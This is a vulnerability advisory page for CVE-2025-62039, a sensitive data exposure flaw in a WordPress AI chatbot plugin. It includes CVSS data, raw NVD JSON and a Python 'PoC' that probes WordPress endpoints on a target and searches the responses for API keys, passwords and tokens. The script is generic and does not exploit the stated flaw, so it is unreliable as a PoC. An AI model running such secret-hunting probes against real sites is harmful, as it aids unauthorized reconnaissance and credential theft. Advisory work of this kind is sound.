Security Vulnerability Report
中文
CVE-2025-62039 CVSS 7.5 HIGH

CVE-2025-62039

Published: 2025-11-06 16:16:10
Last Modified: 2026-04-15 00:35:42

Description

Insertion of Sensitive Information Into Sent Data vulnerability in Ays Pro AI ChatBot with ChatGPT and Content Generator by AYS ays-chatgpt-assistant allows Retrieve Embedded Sensitive Data.This issue affects AI ChatBot with ChatGPT and Content Generator by AYS: from n/a through <= 2.6.6.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

ays-chatgpt-assistant <= 2.6.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62039 PoC - Ays ChatGPT Assistant Sensitive Data Exposure # Affected Plugin: ays-chatgpt-assistant <= 2.6.6 import requests import json import sys def exploit_cve_2025_62039(target_url): """ PoC for CVE-2025-62039 Sensitive Information Exposure in AI ChatBot with ChatGPT by AYS """ print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2025-62039...") # Try to access plugin endpoints that might leak sensitive data endpoints = [ "/wp-admin/admin-ajax.php", "/wp-content/plugins/ays-chatgpt-assistant/", "/wp-json/wp/v2/settings" ] for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, timeout=10, verify=False) print(f"[+] Endpoint: {endpoint}") print(f" Status: {response.status_code}") # Check for sensitive data patterns sensitive_patterns = ['api_key', 'secret', 'password', 'token', 'credential'] for pattern in sensitive_patterns: if pattern.lower() in response.text.lower(): print(f"[!] Potential sensitive data found: {pattern}") except Exception as e: print(f"[-] Error accessing {endpoint}: {e}") print("[*] Manual verification required via browser or Burp Suite") print("[*] Check plugin source code for embedded sensitive data") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com") sys.exit(1) target = sys.argv[1] exploit_cve_2025_62039(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62039", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:10.387", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in Ays Pro AI ChatBot with ChatGPT and Content Generator by AYS ays-chatgpt-assistant allows Retrieve Embedded Sensitive Data.This issue affects AI ChatBot with ChatGPT and Content Generator by AYS: from n/a through <= 2.6.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ays-chatgpt-assistant/vulnerability/wordpress-ai-chatbot-with-chatgpt-and-content-generator-by-ays-plugin-2-6-6-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}